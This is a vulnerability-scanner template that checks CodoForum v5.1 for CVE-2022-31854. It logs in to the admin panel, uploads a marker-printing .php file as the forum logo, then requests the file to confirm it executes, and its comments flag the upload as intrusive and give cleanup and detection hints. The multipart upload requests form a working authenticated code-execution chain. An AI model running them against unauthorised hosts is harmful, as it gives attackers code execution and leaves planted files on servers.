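# Detection template for CVE-2022-31854 (CWE-434, unrestricted file upload).
# The check is authenticated (CVSS PR:H): the requests section logs in to the
# admin panel with operator-supplied username/password variables.
id: CVE-2022-31854

info:
  name: CodoForum v5.1 - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel.
  reference:
    - https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31854
    - https://codoforum.com
    - https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-31854
    cwe-id: CWE-434
  metadata:
    verified: "true"
  # "intrusive" added: the check writes a .php file into the forum's
  # attachments directory and never removes it, so it changes state on the
  # scanned host. The tag lets routine scans exclude it; after a positive
  # result the leftover file should be deleted from the server.
  tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive
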
# Four-step authenticated check. The raw bodies below are sent verbatim, so
# blank lines inside them are significant (multipart part separators).
requests:
  - raw:
      # 1. Log in to the admin panel; username/password are supplied by the
      #    operator and the session cookie is carried forward (cookie-reuse).
      - |
        POST /admin/?page=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB

        ------WebKitFormBoundaryACGPpj7UIqmtLNbB
        Content-Disposition: form-data; name="username"

        {{username}}
        ------WebKitFormBoundaryACGPpj7UIqmtLNbB
        Content-Disposition: form-data; name="password"

        {{password}}
        ------WebKitFormBoundaryACGPpj7UIqmtLNbB--

      # 2. Load the config page; presumably this is the response the csrf
      #    extractor below takes the CSRF_token form value from.
      - |
        GET /admin/index.php?page=config HTTP/1.1
        Host: {{Hostname}}

      # 3. Submit the config form with a .php file in the forum_logo field.
      #    The file only prints a fixed marker hash. Detection hint: a POST to
      #    page=config whose forum_logo filename ends in .php is not a
      #    legitimate logo change.
      - |
        POST /admin/index.php?page=config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA

        ------WebKitFormBoundaryoLtdjuqj2ixPvBhA
        Content-Disposition: form-data; name="site_title"


        ------WebKitFormBoundaryoLtdjuqj2ixPvBhA
        Content-Disposition: form-data; name="forum_logo"; filename="{{randstr}}.php"
        Content-Type: application/x-httpd-php

        <?php

        echo md5('CVE-2022-31854');

        ?>
        ------WebKitFormBoundaryoLtdjuqj2ixPvBhA
        Content-Disposition: form-data; name="CSRF_token"

        {{csrf}}
        ------WebKitFormBoundaryoLtdjuqj2ixPvBhA--

      # 4. Request the stored file. Nothing in this template deletes it, so
      #    any .php file under this attachments path is an artefact to remove
      #    (and an indicator worth alerting on).
      - |
        GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    # All three conditions must hold on the 4th response. The body must hold
    # the marker hash rather than the PHP source text, i.e. the file was
    # executed by the server and not merely stored or served as plain text.
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'status_code_4 == 200'
          - 'contains(content_type_4, "text/html")'
          - 'contains(body_4, "a63fd49130de6406a66600cd8caa162f")'

    # internal: true keeps the token out of scan output; it is only used to
    # fill {{csrf}} in request 3.
    extractors:
      - type: regex
        name: csrf
        internal: true
        group: 1
        regex:
          - 'name="CSRF_token" value="([0-9a-zA-Z]+)"/>'